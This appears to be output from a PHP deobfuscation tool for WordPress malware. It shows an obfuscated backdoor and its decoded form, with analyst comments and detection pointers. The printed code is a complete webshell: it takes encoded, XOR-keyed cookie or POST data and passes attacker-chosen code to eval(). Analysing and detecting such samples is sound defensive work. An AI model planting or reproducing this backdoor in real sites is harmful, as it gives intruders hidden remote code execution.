
PHP deobfuscation, decryption, reconstruction tool

Deobfuscate PHP malware, viruses, and tampered code found on WordPress sites back into its original, readable form.

*Please note that not all obfuscated code can be decoded.

The code below has been decoded.

<?php $mjysd = '8it#vr64\'*o5eamfu9g1dksb7n23yHpx0_cl-'; $yeqvi = []; $yeqvi[] = $mjysd[29] . $mjysd[9]; $yeqvi[] = $mjysd[27] . $mjysd[13] . $mjysd[32] . $mjysd[26] . $mjysd[12] . $mjysd[23] . $mjysd[26] . $mjysd[26] . $mjysd[36] . $mjysd[11] . $mjysd[0] . $mjysd[12] . $mjysd[6] . $mjysd[36] . $...



Obfuscated PHP code

<?php
// Analyst summary: obfuscated backdoor driven by request data. For each entry
// of the merged $_COOKIE/$_POST input, the value is hex-decoded, XORed with a
// keystream derived from the entry's name plus an embedded GUID-like string,
// split on '#', and -- when the number of pieces is a multiple of 3 -- the
// result of calling piece [1] on piece [2] is passed to eval().
// Detection pointers visible in this sample: a short character table indexed
// one character at a time, variable-function calls through an array, and
// eval() fed by request-derived data.

// Character table: every string used below is assembled by indexing into it,
// so no function name appears literally in the file.
$mjysd = '8it#vr64\'*o5eamfu9g1dksb7n23yHpx0_cl-';
// Lookup table of the assembled strings; entries are later invoked as
// variable functions or passed as arguments.
$yeqvi = [];
// [0] => "H*" (pack() format: hex string)
$yeqvi[] = $mjysd[29] . $mjysd[9];
// [1] => "3a02eb22-58e6-442f-bad6-1491d2f689d7" (embedded key material that
// is appended to the field name when the keystream is built)
$yeqvi[] =
    $mjysd[27] .
    $mjysd[13] .
    $mjysd[32] .
    $mjysd[26] .
    $mjysd[12] .
    $mjysd[23] .
    $mjysd[26] .
    $mjysd[26] .
    $mjysd[36] .
    $mjysd[11] .
    $mjysd[0] .
    $mjysd[12] .
    $mjysd[6] .
    $mjysd[36] .
    $mjysd[7] .
    $mjysd[7] .
    $mjysd[26] .
    $mjysd[15] .
    $mjysd[36] .
    $mjysd[23] .
    $mjysd[13] .
    $mjysd[20] .
    $mjysd[6] .
    $mjysd[36] .
    $mjysd[19] .
    $mjysd[7] .
    $mjysd[17] .
    $mjysd[19] .
    $mjysd[20] .
    $mjysd[26] .
    $mjysd[15] .
    $mjysd[6] .
    $mjysd[0] .
    $mjysd[17] .
    $mjysd[20] .
    $mjysd[24];
// [2] => "#" (delimiter later passed to explode())
$yeqvi[] = $mjysd[3];
// [3] => "count"
$yeqvi[] = $mjysd[34] . $mjysd[10] . $mjysd[16] . $mjysd[25] . $mjysd[2];
// [4] => "str_repeat"
$yeqvi[] =
    $mjysd[22] .
    $mjysd[2] .
    $mjysd[5] .
    $mjysd[33] .
    $mjysd[5] .
    $mjysd[12] .
    $mjysd[30] .
    $mjysd[12] .
    $mjysd[13] .
    $mjysd[2];
// [5] => "explode"
$yeqvi[] =
    $mjysd[12] .
    $mjysd[31] .
    $mjysd[30] .
    $mjysd[35] .
    $mjysd[10] .
    $mjysd[20] .
    $mjysd[12];
// [6] => "substr"
$yeqvi[] =
    $mjysd[22] . $mjysd[16] . $mjysd[23] . $mjysd[22] . $mjysd[2] . $mjysd[5];
// [7] => "array_merge"
$yeqvi[] =
    $mjysd[13] .
    $mjysd[5] .
    $mjysd[5] .
    $mjysd[13] .
    $mjysd[28] .
    $mjysd[33] .
    $mjysd[14] .
    $mjysd[12] .
    $mjysd[5] .
    $mjysd[18] .
    $mjysd[12];
// [8] => "strlen"
$yeqvi[] =
    $mjysd[22] . $mjysd[2] . $mjysd[5] . $mjysd[35] . $mjysd[12] . $mjysd[25];
// [9] => "pack"
$yeqvi[] = $mjysd[30] . $mjysd[13] . $mjysd[34] . $mjysd[21];
// $yeqvi[7] is "array_merge": iterate over every cookie and POST field
// ($jrjvo = field name, $flxnx = field value).
foreach ($yeqvi[7]($_COOKIE, $_POST) as $jrjvo => $flxnx) {
    // NOTE(review): the three functions below are declared inside the loop
    // body; a second iteration would presumably fail with a "cannot
    // redeclare" fatal error -- confirm on the affected PHP version.

    // Keystream builder: repeats ($jrjvo . $yeqvi[1]) with $yeqvi[4]
    // ("str_repeat") and trims it to $lfhzra bytes with $yeqvi[6] ("substr").
    // The repeat count is derived from the length of the field name alone
    // ($yeqvi[8] is "strlen").
    function akrpta($yeqvi, $jrjvo, $lfhzra)
    {
        return $yeqvi[6](
            $yeqvi[4]($jrjvo . $yeqvi[1], $lfhzra / $yeqvi[8]($jrjvo) + 1),
            0,
            $lfhzra
        );
    }
    // Hex decoder: calls $yeqvi[9] ("pack") with format $yeqvi[0] ("H*") on
    // $iptmsq; the @ operator suppresses any warning pack() would raise.
    function fwavtof($yeqvi, $iptmsq)
    {
        return @$yeqvi[9]($yeqvi[0], $iptmsq);
    }
    // Execution gate: $yeqvi[3] is "count". When the number of elements in
    // $iptmsq is a multiple of 3, element [1] is called as a function on
    // element [2], the return value is eval()'d, and the script exits.
    // Both elements come from the decoded request value, so the sender
    // chooses the code that runs.
    function yljyac($yeqvi, $iptmsq)
    {
        $feryg = $yeqvi[3]($iptmsq) % 3;
        if (!$feryg) {
            eval($iptmsq[1]($iptmsq[2]));
            exit();
        }
    }
    // Hex-decode the raw field value.
    $flxnx = fwavtof($yeqvi, $flxnx);
    // XOR the decoded bytes with a keystream of equal length, split the
    // result on "#" ($yeqvi[5] is "explode", $yeqvi[2] is "#"), and hand the
    // pieces to the execution gate.
    yljyac(
        $yeqvi,
        $yeqvi[5]($yeqvi[2], $flxnx ^ akrpta($yeqvi, $jrjvo, $yeqvi[8]($flxnx)))
    );
}

Decoded (deobfuscated) PHP code

<?php
// Analyst summary: decoded form of a backdoor driven by request data. For
// each entry of the merged $_COOKIE/$_POST input, the value is hex-decoded
// with pack("H*"), XORed with a keystream derived from the entry's name plus
// the GUID-like string in $yeqvi[1], split on "#", and -- when the number of
// pieces is a multiple of 3 -- the result of calling piece [1] on piece [2]
// is passed to eval().
// Detection pointers visible in this sample: eval() fed by a variable-function
// call, pack("H*") applied to request input, and the literal string held in
// $yeqvi[1].

// Character table left over from the obfuscated form; only index 3 ("#") is
// still read from it below.
$mjysd = '8it#vr64\'*o5eamfu9g1dksb7n23yHpx0_cl-';
// Lookup table; entries are invoked as variable functions or passed as
// arguments, so the calls below still go through $yeqvi[N].
$yeqvi = [];
// [0] pack() format: hex string
$yeqvi[] = "H*";
// [1] embedded key material appended to the field name for the keystream
$yeqvi[] = "3a02eb22-58e6-442f-bad6-1491d2f689d7";
// [2] resolves to "#", the delimiter passed to explode()
$yeqvi[] = $mjysd[3];
// [3]..[9] names of built-in functions called indirectly
$yeqvi[] = "count";
$yeqvi[] = "str_repeat";
$yeqvi[] = "explode";
$yeqvi[] = "substr";
$yeqvi[] = "array_merge";
$yeqvi[] = "strlen";
$yeqvi[] = "pack";
// Iterate over every cookie and POST field ($jrjvo = name, $flxnx = value).
foreach (array_merge($_COOKIE, $_POST) as $jrjvo => $flxnx) {
    // NOTE(review): the three functions below are declared inside the loop
    // body; a second iteration would presumably fail with a "cannot
    // redeclare" fatal error -- confirm on the affected PHP version.

    // Keystream builder: substr(str_repeat($jrjvo . $yeqvi[1], ...), 0,
    // $lfhzra). The repeat count is derived from strlen($jrjvo) alone.
    function akrpta($yeqvi, $jrjvo, $lfhzra)
    {
        return $yeqvi[6]($yeqvi[4]($jrjvo . $yeqvi[1], $lfhzra / $yeqvi[8]($jrjvo) + 1), 0, $lfhzra);
    }
    // Hex decoder: pack("H*", $iptmsq); the @ operator suppresses any
    // warning pack() would raise.
    function fwavtof($yeqvi, $iptmsq)
    {
        return @$yeqvi[9]($yeqvi[0], $iptmsq);
    }
    // Execution gate: when count($iptmsq) is a multiple of 3, element [1] is
    // called as a function on element [2], the return value is eval()'d, and
    // the script exits. Both elements come from the decoded request value,
    // so the sender chooses the code that runs.
    function yljyac($yeqvi, $iptmsq)
    {
        $feryg = $yeqvi[3]($iptmsq) % 3;
        if (!$feryg) {
            eval($iptmsq[1]($iptmsq[2]));
            exit;
        }
    }
    // Hex-decode the raw field value.
    $flxnx = fwavtof($yeqvi, $flxnx);
    // XOR the decoded bytes with a keystream of equal length, explode() the
    // result on "#", and hand the pieces to the execution gate.
    yljyac($yeqvi, $yeqvi[5]($yeqvi[2], $flxnx ^ akrpta($yeqvi, $jrjvo, $yeqvi[8]($flxnx))));
}

